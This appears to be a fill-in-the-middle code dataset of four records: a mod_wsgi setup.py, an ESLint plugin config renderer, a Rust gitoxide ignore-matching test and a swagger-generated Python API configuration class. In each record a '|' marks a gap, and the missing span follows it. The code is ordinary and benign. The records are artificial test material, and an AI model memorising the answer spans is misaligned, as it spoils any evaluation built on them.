if LOCAL_TARBALL_FILE:
shutil.rmtree('src/packages', ignore_errors=True)
tar = tarfile.open(LOCAL_TARBALL_FILE)
tar.extractall('src/packages')
tar.close()
open('src/packages/__init__.py', 'a').close()
package_files = []
for root, dirs, files in os.walk('src/packages', topdown=False):
for name in files:
path = os.path.join(root, name).split('/', 1)[1]
package_files.append(path)
print('adding ', path)
print('Running setup for Apache')
setup(name = 'mod_wsgi-packages',
version = '1.0.0',
packages = ['mod_wsgi', 'mod_wsgi.packages'],
package_dir = {'mod_wsgi': 'src'},
package_data = {'mod_wsgi': package_files},
)
# From this point on we will now actually install mod_wsgi. First we need
# to work out what all the available source code files are that should be
# compiled.
source_files = [os.path.join('src/server', name) for name in
os.listdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'src/server')) if fnmatch.fnmatch(name, '*.c')]
# Work out all the Apache specific compilation flags. This is done using
# the standard Apache apxs command unless we are installing our own build
# of Apache. In that case we use Python code to do the equivalent of apxs
# as apxs will not work due to paths not matching where it was installed.
def
|
(names, default=None, paths=[]):
for name in names:
for path in os.environ['PATH'].split(':') + paths:
program = os.path.join(path, name)
if os.path.exists(program):
return program
return default
APXS = os.environ.get('APXS')
WITH_HTTPD_PACKAGE = False
if APXS is None:
APXS = find_program(['mod_wsgi-apxs'],
paths=[os.path.dirname(sys.executable)])
if APXS is not None:
WITH_HTTPD_PACKAGE = True
if APXS is None:
APXS = find_program(['mod_wsgi-apxs', 'apxs2', 'apxs'],
'apxs', ['/usr/sbin', os.getcwd()])
elif not os.path.isabs(APXS):
APXS = find_program([APXS], APXS, ['/usr/sbin', os.getcwd()])
WITHOUT_APXS = False
WITH_WINDOWS_APACHE = None
WITH_MACOSX_APACHE = None
if not WITH_TARBALL_PACKAGE:
if not os.path.isabs(APXS) or not os.access(APXS, os.X_OK):
WITHOUT_APXS = True
if WITHOUT_APXS and os.name == 'nt':
APACHE_ROOTDIR = os.environ.get('MOD_WSGI_APACHE_ROOTDIR')
if APACHE_ROOTDIR:
if os.path.exists(APACHE_ROOTDIR):
WITH_WINDOWS_APACHE = APACHE_ROOTDIR
else:
raise RuntimeError('The Apache directory %r does not exist.' %
APACHE_ROOTDIR)
else:
if os.path.exists('c:\\Apache24'):
WITH_WINDOWS_APACHE = 'c:\\Apache24'
elif os.path.exists('c:\\Apache22'):
WITH_WINDOWS_APACHE = 'c:\\Apache22'
elif os.path.exists('c:\\Apache2'):
WITH_WINDOWS_APACHE = 'c:\\Apache2'
else:
raise RuntimeError('No Apache installation can be found. Set the '
'MOD_WSGI_APACHE_ROOTDIR environment to its location.')
elif WITHOUT_APXS and sys.platform == 'darwin':
WITH_MACOSX_APACHE = '/Applications/Xcode.app'
if WITHOUT_APXS and not WITH_WINDOWS_APACHE and not WITH_MACOSX_APACHE:
raise RuntimeError('The %r command appears not to be installed or '
'is not executable. Please check the list of prerequisites '
'in the documentation for this package and install any '
'missing Apache httpd server packages.' % APXS)
if WITH_WINDOWS_APACHE:
def get_apxs_config(name):
if name == 'INCLUDEDIR':
return WITH_WINDOWS_APACHE + '/include'
elif name == 'LIBEXECDIR':
return WITH_WINDOWS_APACHE + '/lib'
else:
return ''
def get_apr_includes():
return ''
def get_apu_includes():
return ''
elif WITH_MACOSX_APACHE:
def get_apxs_config(name):
if name == 'BINDIR':
return '/usr/bin'
elif name == 'SBINDIR':
return '/usr/sbin'
elif name == 'LIBEXECDIR':
return '/usr/libexec/apache2'
elif name == 'PROGNAME':
return 'httpd'
elif name == 'SHLIBPATH_VAR':
return 'DYLD_LIBRARY_PATH'
else:
return ''
def get_apr_includes():
return ''
def get_apu_includes():
return ''
elif WITH_TARBALL_PACKAGE:
SCRIPT_DIR = os.path.join(os.path.dirname(__file__), 'src', 'packages')
CONFIG_FILE = os.path.join(SCRIPT_DIR, 'apache/build/config_vars.mk')
CONFIG = {}
with open(CONFIG_FILE) as fp:
for line in fp.readlines():
name, value = line.split('=', 1)
name = name.strip()
value = value.strip()
CONFIG[name] = value
_varprog = re.compile(r'\$(\w+|(?:\{[^}]*\}|\([^)]*\)))')
def expand_vars(value):
if '$' not in value:
return value
i = 0
while True:
m = _varprog.search(value, i)
if not m:
break
i, j = m.span(0)
name = m.group(1)
if name.startswith('{') and name.endswith('}'):
name = name[1:-1]
elif name.startswith('(') and name.endswith(')'):
name = name[1:-1]
if name in CONFIG:
tail = value[j:]
value = value[:i] + CONFIG.get(name, '')
i = len(value)
value += tail
else:
i = j
return value
def get_apxs_config(name):
value = CONFIG.get(name, '')
sub_value = expand_vars(value)
while value != sub_value:
value = sub_value
sub_value = expand_vars(value)
return sub_value.replace('/mod_wsgi-packages/', SCRIPT_DIR+'/')
def get_apr_includes():
return ''
def get_apu_includes():
return ''
CONFIG['PREFIX'] = get_apxs_config('prefix')
CONFIG['TARGET'] = get_apxs_config('target')
CONFIG['SYSCONFDIR'] = get_apxs_config('sysconfdir')
CONFIG['INCLUDEDIR'] = get_apxs_config('includedir')
CONFIG['LIBEXECDIR'] = get_apxs_config('libexecdir')
CONFIG['BINDIR'] = get_apxs_config('bindir')
CONFIG['SBINDIR'] = get_apxs_config('sbindir')
CONFIG['PROGNAME'] = get_apxs_config('progname')
else:
def get_apxs_config(query):
p = subprocess.Popen([APXS, '-q', query],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
def get_apr_includes():
if not APR_CONFIG:
return ''
p = subprocess.Popen([APR_CONFIG, '--includes'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
def get_apu_includes():
if not APU_CONFIG:
return ''
p = subprocess.Popen([APU_CONFIG, '--includes'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
INCLUDEDIR = get_apxs_config('INCLUDEDIR')
CPPFLAGS = get_apxs_config('CPPFLAGS').split()
CFLAGS = get_apxs_config('CFLAGS').split()
EXTRA_INCLUDES = get_apxs_config('EXTRA_INCLUDES').split()
EXTRA_CPPFLAGS = get_apxs_config('EXTRA_CPPFLAGS').split()
EXTRA_CFLAGS = get_apxs_config('EXTRA_CFLAGS').split()
APR_CONFIG = get_apxs_config('APR_CONFIG')
APU_CONFIG = get_apxs_config('APU_CONFIG')
# Make sure that 'apr-1-config' exists. If it doesn't we may be running
# on MacOS X Sierra, which has decided to not provide either it or the
# 'apu-1-config' script and otherwise completely broken 'apxs'. In that
# case we manually set the locations of the Apache and APR header files.
if (not os.path.exists(APR_CONFIG) and
os.path.exists('/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk')):
INCLUDEDIR = '/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/apache2'
APR_INCLUDES = ['-I/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/apr-1']
APU_INCLUDES = []
elif (not os.path.exists(APR_CONFIG) and
os.path.exists('/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk')):
INCLUDEDIR = '/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk/usr/include/apache2'
APR_INCLUDES = ['-I/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk/usr/include/apr-1']
APU_INCLUDES = []
else:
APR_INCLUDES = get_apr_includes().split()
APU_INCLUDES = get_apu_includes().split()
if not os.path.exists(APR_CONFIG) and not INCLUDEDIR:
if sys.platform == 'darwin':
# Likely no Xcode application installed or location of SDK in
# Xcode has changed with a new release of Xcode application.
raise RuntimeError('No Apache installation can be found, do you '
'have the full Apple Xcode installed. It is not enough to '
'have just the xcode command line tools installed.')
else:
# Set INCLUDEDIR just to avoid having an empty path. Probably
# should raise an exception here.
INCLUDEDIR = '/usr/include'
# Write out apxs_config.py which caches various configuration related to
# Apache. For the case of using our own Apache build, this needs to
# calculate values dynamically based on where binaries were installed.
# This is necessary as on OpenShift the virtual environment gets copied
# for each gear to a different path. We can't therefore rely on a hard
# coded path.
BINDIR = get_apxs_config('BINDIR')
SBINDIR = get_apxs_config('SBINDIR')
PROGNAME = get_apxs_config('PROGNAME')
MPM_NAME = get_apxs_config('MPM_NAME')
LIBEXECDIR = get_apxs_config('LIBEXECDIR')
SHLIBPATH_VAR = get_apxs_config('SHLIBPATH_VAR')
APXS_CONFIG_TEMPLATE = """
import os
WITH_TARBALL_PACKAGE = %(WITH_TARBALL_PACKAGE)r
WITH_HTTPD_PACKAGE = %(WITH_HTTPD_PACKAGE)r
if WITH_HTTPD_PACKAGE:
from mod_wsgi_packages.httpd import __file__ as PACKAGES_ROOTDIR
PACKAGES_ROOTDIR = os.path.dirname(PACKAGES_ROOTDIR)
BINDIR = os.path.join(PACKAGES_ROOTDIR, 'bin')
SBINDIR = BINDIR
LIBEXECDIR = os.path.join(PACKAGES_ROOTDIR, 'modules')
SHLIBPATH = os.path.join(PACKAGES_ROOTDIR, 'lib')
elif WITH_TARBALL_PACKAGE:
from mod_wsgi.packages import __file__ as PACKAGES_ROOTDIR
PACKAGES_ROOTDIR = os.path.dirname(PACKAGES_ROOTDIR)
BINDIR = os.path.join(PACKAGES_ROOTDIR, 'apache', 'bin')
SBINDIR = BINDIR
LIBEXECDIR = os.path.join(PACKAGES_ROOTDIR, 'apache', 'modules')
SHLIBPATH = []
SHLIBPATH.append(os.path.join(PACKAGES_ROOTDIR, 'apr-util', 'lib'))
SHLIBPATH.append(os.path.join(PACKAGES_ROOTDIR, 'apr', 'lib'))
SHLIBPATH = ':'.join(SHLIBPATH)
else:
BINDIR = '%(BINDIR)s'
SBINDIR = '%(SBINDIR)s'
LIBEXECDIR = '%(LIBEXECDIR)s'
SHLIBPATH = ''
MPM_NAME = '%(MPM_NAME)s'
PROGNAME = '%(PROGNAME)s'
SHLIBPATH_VAR = '%(SHLIBPATH_VAR)s'
if os.path.exists(os.path.join(SBINDIR, PROGNAME)):
HTTPD = os.path.join(SBINDIR, PROGNAME)
elif os.path.exists(os.path.join(BINDIR, PROGNAME)):
HTTPD = os.path.join(BINDIR, PROGNAME)
else:
HTTPD = PROGNAME
if os.path.exists(os.path.join(SBINDIR, 'rotatelogs')):
ROTATELOGS = os.path.join(SBINDIR, 'rotatelogs')
elif os.path.exists(os.path.join(BINDIR, 'rotatelogs')):
ROTATELOGS = os.path.join(BINDIR, 'rotatelogs')
else:
ROTATELOGS = 'rotatelogs'
"""
with open(os.path.join(os.path.dirname(__file__),
'src/server/apxs_config.py'), 'w') as fp:
print(APXS_CONFIG_TEMPLATE % dict(
WITH_TARBALL_PACKAGE=WITH_TARBALL_PACKAGE,
WITH_HTTPD_PACKAGE=WITH_HTTPD_PACKAGE,
BINDIR=BINDIR, SBINDIR=SBINDIR, LIBEXECDIR=LIBEXECDIR,
MPM_NAME=MPM_NAME, PROGNAME=PROGNAME,
SHLIBPATH_VAR=SHLIBPATH_VAR), file=fp)
# Work out location of Python library and how to link it.
PYTHON_VERSION = get_python_config('VERSION')
if os.name == 'nt':
if hasattr(sys, 'real_prefix'):
PYTHON_LIBDIR = sys.real_prefix
else:
PYTHON_LIBDIR = get_python_config('BINDIR')
PYTHON_LDFLAGS = []
PYTHON_LDLIBS = ['%s/libs/python%s.lib' % (PYTHON_LIBDIR, PYTHON_VERSION),
'%s/lib/libhttpd.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libapr-1.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libaprutil-1.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libapriconv-1.lib' % WITH_WINDOWS_APACHE]
else:
PYTHON_LDVERSION = get_python_config('LDVERSION') or PYTHON_VERSION
PYTHON_LIBDIR = get_python_config('LIBDIR')
PYTHON_CFGDIR = get_python_lib(plat_specific=1, standard_lib=1) + '/config'
if PYTHON_LDVERSION and PYTHON_LDVERSION != PYTHON_VERSION:
PYTHON_CFGDIR = '%s-%s' % (PYTHON_CFGDIR, PYTHON_LDVERSION)
if not os.path.exists(PYTHON_CFGDIR):
PYTHON_CFGDIR = '%s-%s' % (PYTHON_CFGDIR, sys.platform)
PYTHON_LDFLAGS = ['-L%s' % PYTHON_LIBDIR, '-L%s' % PYTHON_CFGDIR]
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_LDVERSION]
if os.path.exists(os.path.join(PYTHON_LIBDIR,
'libpython%s.a' % PYTHON_VERSION)):
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_VERSION]
if os.path.exists(os.path.join(PYTHON_CFGDIR,
'libpython%s.a' % PYTHON_VERSION)):
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_VERSION]
# Create the final set of compilation flags to be used.
INCLUDE_DIRS = [INCLUDEDIR]
EXTRA_COMPILE_FLAGS = (EXTRA_INCLUDES + CPPFLAGS + EXTRA_CPPFLAGS +
CFLAGS + EXTRA_CFLAGS + APR_INCLUDES + APU_INCLUDES)
EXTRA_LINK_ARGS = PYTHON_LDFLAGS + PYTHON_LDLIBS
# Force adding of LD_RUN_PATH for platforms that may need it.
if os.name != 'nt':
LD_RUN_PATH = os.environ.get('LD_RUN_PATH', '')
LD_RUN_PATH += ':%s:%s' % (PYTHON_LIBDIR, PYTHON_CFGDIR)
LD_RUN_PATH = LD_RUN_PATH.lstrip(':')
os.environ['LD_RUN_PATH'] = LD_RUN_PATH
# On MacOS X, recent versions of Apple's Apache do not support compiling
# Apache modules with a target older than 10.8. This is because it
# screws up Apache APR % formats for apr_time_t, which breaks daemon
# mode queue time. For the target to be 10.8 or newer for now if Python
# installation supports older versions. This means that things will not
# build for older MacOS X versions. Deal with these when they occur.
if sys.platform == 'darwin':
target = os.environ.get('MACOSX_DEPLOYMENT_TARGET')
if target is None:
target = get_python_config('MACOSX_DEPLOYMENT_TARGET')
if target:
target_version = tuple(map(int, target.split('.')))
#assert target_version >= (10, 8), \
# 'Minimum of 10.8 for MACOSX_DEPLOYMENT_TARGET'
if target_version < (10, 8):
os.environ['MACOSX_DEPLOYMENT_TARGET'] = '10.8'
# Now add the definitions to build everything.
if os.name == 'nt':
extension_name = 'mod_wsgi.server.mod_wsgi'
else:
extension_name = 'mod_wsgi.server.mod_wsgi-py%s%s' % sys.version_info[:2]
extension = Extension(extension_name, source_files,
include_dirs=INCLUDE_DIRS, extra_compile_args=EXTRA_COMPILE_FLAGS,
extra_link_args=EXTRA_LINK_ARGS)
def _documentation():
result = []
prefix = 'docs/_build/html'
for root, dirs, files in os.walk(prefix, topdown=False):
for name in files:
if root == prefix:
result.append(os.path.join(root[len(prefix):], name))
else:
result.append(os.path.join(root[len(prefix)+1:], name))
return result
def _version():
path = 'src/server/wsgi_version.h'
pattern = r'#define MOD_WSGI_VERSION_STRING "(?P<version>[^"]*)"'
with open(path, 'r') as fp:
match = re.search(pattern, fp.read(), flags=re.MULTILINE)
return match.group('version')
# Final check to make sure a shared library for Python does actually
# exist. Warn if one doesn't as we really want a shared library.
SHARED_LIBRARY_WARNING = """
WARNING: The Python installation you are using does not appear to have
been installed with a shared library, or in the case of MacOS X, as a
framework. Where these are not present, the compilation of mod_wsgi may
fail, or if it does succeed, will result in extra memory being used by
all processes at run time as a result of the static library needing to
be loaded in its entirety to every process. It is highly recommended
that you reinstall the Python installation being used from source code,
supplying the '--enable-shared' option to the 'configure' script when
configuring the source code prior to building and installing it.
"""
if os.name != 'nt':
if (not get_python_config('Py_ENABLE_SHARED') and
not get_python_config('PYTHONFRAMEWORK')):
print(SHARED_LIBRARY_WARNING)
# Now finally run distutils.
long_description = open('README.rst').read()
setup(name = 'mod_wsgi',
version = _version(),
description = 'Installer for Apache/mod_wsgi.',
long_description = long_description,
author = 'Graham Dumpleton',
author_email = '[email protected]',
maintainer = 'Graham Dumpleton',
maintainer_email = '[email protected]',
url = 'http://www.modwsgi.org/',
bugtrack_url = 'https://github.com/GrahamDumpleton/mod_wsgi/issues',
license = 'Apache License, Version 2.0',
platforms = [],
download_url = None,
classifiers = [
'Development Status :: 6 - Mature',
'License :: OSI Approved :: Apache Software License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: Linux',
'Operating System :: POSIX :: SunOS/Solaris',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server'
],
keywords = 'mod_wsgi wsgi apache',
packages = ['mod_wsgi', 'mod_wsgi.server', 'mod_wsgi.server.management',
'mod_wsgi.server.management.commands', 'mod_wsgi.docs',
'mod_wsgi.images'],
package_dir = {'mod_wsgi': 'src', 'mod_wsgi.docs': 'docs/_build/html',
'mod_wsgi.images': 'images'},
package_data = {'mod_wsgi.docs': _documentation(),
'mod_wsgi.images': ['snake-whiskey.jpg']},
ext_modules = [extension],
entry_points = { 'console_scripts':
['mod_wsgi-express = mod_wsgi.server:main'],},
zip_safe = False,
)
|
find_program
|
render-plugin-configs.js
|
#!/usr/bin/env node
'use strict';
const fs = require('fs');
const path = require('path');
const writeFile = require('util').promisify(fs.writeFile);
/* eslint-disable import/no-extraneous-dependencies */
const { ESLint } = require('eslint');
const ConfigValidator = require('@eslint/eslintrc/lib/shared/config-validator');
const BuiltInEnvironments = require('@eslint/eslintrc/conf/environments');
/* eslint-enable import/no-extraneous-dependencies */
const { getPluginEnvironments } = require('./plugins');
const PLUGIN_ENVIRONMENTS = new Map(Object.entries(getPluginEnvironments()));
async function main() {
const jestTask = renderConfig(
'jest',
{
extends: ['zillow/jest'],
rules: {
// plugin-specific rules that hamper effective testing
'@typescript-eslint/no-invalid-void-type': ['off'],
'no-import-assign': ['off'],
'react/prop-types': ['off'],
},
},
[
// prettier-ignore
'**/*{-,.}test.[jt]s?(x)',
'**/*.stories.[jt]s?(x)',
'**/__tests__/**/*.[jt]s?(x)',
'**/__mocks__/**/*.[jt]s?(x)',
'**/test/**/*.[jt]s?(x)',
]
);
const mochaTask = renderConfig(
'mocha',
{
extends: ['zillow/mocha'],
rules: {
// mocha does fancy things with test case scope,
// and this conflicts with mocha/no-mocha-arrow
'prefer-arrow-callback': 'off',
'func-names': 'off',
'no-import-assign': ['off'],
'react/prop-types': ['off'],
},
},
[
// prettier-ignore
'**/*-test.[jt]s?(x)',
'**/test/**/*.[jt]s?(x)',
]
);
const recommendedTask = renderConfig('recommended', {
extends: ['zillow'],
parser: 'babel-eslint',
rules: {
// TODO: re-enable when https://github.com/yannickcr/eslint-plugin-react/commit/2b0d70c is released
'react/prop-types': ['off'],
},
});
const typescriptTask = renderConfig(
'typescript',
{
extends: ['zillow-typescript'],
parser: '@typescript-eslint/parser',
},
['**/*.ts?(x)']
);
/* istanbul ignore next (catch doesn't need coverage) */
try {
await Promise.all([jestTask, mochaTask, recommendedTask, typescriptTask]);
} catch (error) {
// eslint-disable-next-line no-console
console.error(error);
process.exitCode = 1;
}
}
/**
* Render specified ESLint config to JSON file
* @param {string} name
* @param {{ extends: string[], rules?: { [k: string]: any }}} config
* @param {string[]} [overrides] List of override file globs
*/
async function renderConfig(name, config, overrides) {
const validator = new ConfigValidator();
const computedConfig = await getComputedConfig(config);
const wrappedConfig = wrapInPlugin(computedConfig, overrides);
const targetPath = path.resolve(__dirname, `./configs/${name}.json`);
validator.validate(
wrappedConfig,
config.extends[0],
() => {},
// (slightly less) horrible cheese to avoid exploding
envName => PLUGIN_ENVIRONMENTS.get(envName.replace('zillow/', ''))
);
/* istanbul ignore if */
if (process.env.NODE_ENV !== 'test') {
// eslint-disable-next-line no-console
console.log(`writing ${path.relative('.', targetPath)}`);
}
await writeFile(targetPath, JSON.stringify(wrappedConfig, null, 2));
}
/**
* Generate ESLint config object from specified baseConfig
* @param {{ extends: string[], rules?: { [k: string]: any }}} baseConfig
*/
async function getComputedConfig(baseConfig) {
const engine = new ESLint({
useEslintrc: false,
allowInlineConfig: false,
baseConfig,
});
const computed = await engine.calculateConfigForFile('index.js');
// remove unnecessary fields
delete computed.filePath;
delete computed.baseDirectory;
// un-resolve parser (re-resolved during re-export)
if (computed.parser && baseConfig.parser && computed.parser !== baseConfig.parser) {
computed.parser = baseConfig.parser;
}
return computed;
}
function wrapInPlugin(config, files) {
// if files passed, this whole block will be moved to overrides[0]
const pluginConfig = {
files,
// We expose a config already computed from the whole extends chain, so no extends here.
...config,
extends: [],
// Plugins appear to come from this plugin, so it's the only one externally visible.
plugins: ['zillow'],
// The rules from third-party plugins need to be prefixed so they reference our namespace.
rules: prefixRuleConfigs('zillow', config.rules),
};
// if non-builtin envs are passed, make sure they're properly prefixed
if (pluginConfig.env) {
const ourEnv = {};
// eslint-disable-next-line no-restricted-syntax
for (const envName of Object.keys(pluginConfig.env)) {
if (BuiltInEnvironments.has(envName)) {
// pass through builtin environments
ourEnv[envName] = pluginConfig.env[envName];
} else {
// needs prefix to find our wrapper
ourEnv[`zillow/${envName}`] = pluginConfig.env[envName];
}
}
pluginConfig.env = ourEnv;
}
if (files) {
// https://eslint.org/docs/user-guide/configuring#configuration-based-on-glob-patterns
delete pluginConfig.extends;
delete pluginConfig.ignorePatterns;
delete pluginConfig.overrides;
delete pluginConfig.root;
if (pluginConfig.parserOptions && Object.keys(pluginConfig.parserOptions).length === 0) {
delete pluginConfig.parserOptions;
}
return { overrides: [pluginConfig] };
}
// "files" only valid in overrides
delete pluginConfig.files;
return pluginConfig;
}
/**
* Adds a prefix to rules that come from plugins.
*/
function
|
(prefix, rules) {
return Object.keys(rules).reduce((acc, name) => {
// Plugin rules always have a slash in the name
if (name.indexOf('/') !== -1) {
acc[`${prefix}/${name}`] = rules[name];
} else {
acc[name] = rules[name];
}
return acc;
}, {});
}
/* istanbul ignore if */
if (require.main === module) {
// node lib/render-configs.js
main();
} else {
module.exports = main;
}
|
prefixRuleConfigs
|
mod.rs
|
mod ignore {
use std::io::Read;
use bstr::{BStr, ByteSlice};
use git_attributes::{Ignore, Match, MatchGroup};
use git_glob::pattern::Case;
struct Expectations<'a> {
lines: bstr::Lines<'a>,
}
impl<'a> Iterator for Expectations<'a> {
type Item = (&'a BStr, Option<(&'a BStr, usize, &'a BStr)>);
fn next(&mut self) -> Option<Self::Item> {
let line = self.lines.next()?;
let (left, value) = line.split_at(line.find_byte(b'\t').unwrap());
let value = value[1..].as_bstr();
let source_and_line = if left == b"::" {
None
} else {
let mut tokens = left.split(|b| *b == b':');
let source = tokens.next().unwrap().as_bstr();
let line_number: usize = tokens.next().unwrap().to_str_lossy().parse().ok().unwrap();
let pattern = tokens.next().unwrap().as_bstr();
Some((source, line_number, pattern))
};
Some((value, source_and_line))
}
}
#[test]
fn from_git_dir() -> crate::Result {
let dir = git_testtools::scripted_fixture_repo_read_only("make_global_and_external_and_dir_ignores.sh")?;
|
let baseline = std::fs::read(git_dir.parent().unwrap().join("git-check-ignore.baseline"))?;
let mut buf = Vec::new();
let mut group = MatchGroup::from_git_dir(git_dir, Some(dir.join("user.exclude")), &mut buf)?;
assert!(
!group.add_patterns_file("not-a-file", false, None, &mut buf)?,
"missing files are no problem and cause a negative response"
);
assert!(
group.add_patterns_file(repo_dir.join(".gitignore"), true, repo_dir.as_path().into(), &mut buf)?,
"existing files return true"
);
buf.clear();
let ignore_file = repo_dir.join("dir-with-ignore").join(".gitignore");
std::fs::File::open(&ignore_file)?.read_to_end(&mut buf)?;
group.add_patterns_buffer(&buf, ignore_file, repo_dir.as_path().into());
for (path, source_and_line) in (Expectations {
lines: baseline.lines(),
}) {
let actual = group.pattern_matching_relative_path(
path,
repo_dir
.join(path.to_str_lossy().as_ref())
.metadata()
.ok()
.map(|m| m.is_dir()),
Case::Sensitive,
);
match (actual, source_and_line) {
(
Some(Match {
sequence_number,
pattern: _,
source,
value: _,
}),
Some((expected_source, line, _expected_pattern)),
) => {
assert_eq!(sequence_number, line, "our counting should match the one used in git");
assert_eq!(
source.map(|p| p.canonicalize().unwrap()),
Some(repo_dir.join(expected_source.to_str_lossy().as_ref()).canonicalize()?)
);
}
(None, None) => {}
(actual, expected) => panic!("actual {:?} should match {:?} with path '{}'", actual, expected, path),
}
}
Ok(())
}
#[test]
fn from_overrides() {
let input = ["simple", "pattern/"];
let group = git_attributes::MatchGroup::<Ignore>::from_overrides(input);
assert_eq!(
group.pattern_matching_relative_path("Simple", None, git_glob::pattern::Case::Fold),
Some(pattern_to_match(&git_glob::parse("simple").unwrap(), 0))
);
assert_eq!(
group.pattern_matching_relative_path("pattern", Some(true), git_glob::pattern::Case::Sensitive),
Some(pattern_to_match(&git_glob::parse("pattern/").unwrap(), 1))
);
assert_eq!(group.patterns.len(), 1);
assert_eq!(
git_attributes::PatternList::<Ignore>::from_overrides(input),
group.patterns.into_iter().next().unwrap()
);
}
fn pattern_to_match(pattern: &git_glob::Pattern, sequence_number: usize) -> Match<'_, ()> {
Match {
pattern,
value: &(),
source: None,
sequence_number,
}
}
}
|
let repo_dir = dir.join("repo");
let git_dir = repo_dir.join(".git");
|
configuration.py
|
# coding: utf-8
"""
barcodeapi
Barcode APIs let you generate barcode images, and recognize values from images of barcodes. # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class Configuration(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
_default = None
def __init__(self):
"""Constructor"""
if self._default:
for key in self._default.__dict__.keys():
self.__dict__[key] = copy.copy(self._default.__dict__[key])
return
# Default Base url
self.host = "https://api.cloudmersive.com"
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# function to refresh API key if expired
self.refresh_api_key_hook = None
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("cloudmersive_barcode_api_client")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
|
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API
# from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Set this to True/False to enable/disable SSL hostname verification.
self.assert_hostname = None
# urllib3 connection pool's maximum number of connections saved
# per pool. urllib3 uses 1 connection as default value, but this is
# not the best value when you are making a lot of possibly parallel
# requests to the same host, which is often the case here.
# cpu_count * 5 is used as default value to increase performance.
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@classmethod
def set_default(cls, default):
cls._default = default
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
